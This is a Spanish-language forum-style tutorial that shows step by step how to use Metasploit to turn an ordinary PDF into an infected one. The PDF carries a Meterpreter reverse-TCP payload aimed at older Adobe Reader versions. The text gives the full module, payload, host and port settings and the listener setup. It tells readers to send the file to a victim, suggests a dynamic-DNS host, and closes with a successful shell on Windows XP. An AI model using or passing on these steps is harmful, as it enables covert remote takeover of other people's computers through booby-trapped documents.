Aún y que esto ya está corregido en versiones posteriores a la 9.x todavía es factible su uso...

Vamos a crear un pdf infectado utilizando nuestro amigo metasploit...
Crearemos una conexión de la víctima a nosotros, aumentando en cierta medida el éxito de este ataque, puesto que conexiones externas suelen ser rechazadas por el firewall...
Abriremos una terminal y tecleamos:
Código:
msfconsole #quizá tengáis que usar sudo msfconsole...

Una vez cargado metasploit:
Código:
use exploit/windows/fileformat/adobe_pdf_embedded_exe
Este exploit nos ejecutará el PAYLOAD cuando la víctima abra el PDF... Vamos a darle a metasploit el nombre que tendrá nuestro PDF infectado:Código:
set FILENAME aqqle.pdf

Ahora le indicamos el directorio del fichero PDF original a infectar, en mi caso:
Código:
set INFILENAME /home/bugtraq/Hacking/Manuales/mitm.pdf
Indicamos a metasploit el directorio de salida con:Código:
set OUTPUTPATH /home/bugtraq/
Vamos a cargar el PAYLOAD a utilizar, en nuestro caso un reverse_tcp:Código:
set PAYLOAD windows/meterpreter/reverse_tcp
Ok, configuramos ahora nuestra ip (mejor utilizar un NO-ip o similares, ya saben...)Código:
set LHOST 192.168.0.199
Indicamos el puerto...Código:
set LPORT 4455
Y configuramos el S.O y versión de Adobe Reader:Código:
set id 0

Ahora toca hacer el exploit...
Código:
exploit

Dejaremos el exploit de lado para ponernos a la espera de nuestro PAYLOAD. Para ello:
Código:
back
Nos pondremos a la escucha usando:Código:
use exploit/multi/handler
Le indicamos el PAYLOAD:Código:
set PAYLOAD windows/meterpreter/reverse_tcp
Vamos a indicarle nuestra ip así como el puerto a la escucha:Código:
set LHOST 192.168.0.199
Código:
set LPORT 4455
Indicamos id=0:Código:
set id 0

Finalmente...
Código:
exploit

Enviamos nuestro archivo pdf infectado a una víctima, en nuestro caso un Windows XP SP2 y al abrirlo... Se hizo la luz!

Una vez aquí... cada uno que haga lo que quiera, lo suyo seria migrar a explorer etc..
Lo siento Sergi...

Saludos!
. _ ; _ _ . _ ; _ _ . _ ; . _ . . ; .